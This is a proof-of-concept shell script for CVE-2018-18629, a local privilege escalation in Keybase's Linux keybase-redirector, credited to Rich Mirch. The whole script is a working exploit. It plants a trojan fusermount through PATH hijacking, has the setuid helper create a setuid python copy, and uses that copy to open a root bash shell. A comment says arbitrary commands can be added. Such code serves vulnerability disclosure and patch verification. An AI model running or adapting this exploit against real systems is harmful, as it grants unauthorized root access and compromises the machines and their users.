#!/bin/sh
# PoC for CVE-2018-18629 Keybase Linux Privilege Escalation
# Rich Mirch


# build fusermount trojan
# copy python to cwd and make it setuid
# Note: arbitrary commands can be added to this script
cat >fusermount<<EOF
#!/bin/sh
export PATH=/bin:/usr/bin:/sbin:/usr/sbin
cp `which python` woot
chmod 4755 woot
echo "woot" >/dev/tty
EOF

chmod 750 fusermount

env PATH=$PWD:$PATH keybase-redirector /keybase 2>&1 &

sleep 1 # one second should be enough time for fusermount call

./woot -c 'import os;os.setuid(0);os.system("/bin/bash")'
rm -f woot fusermount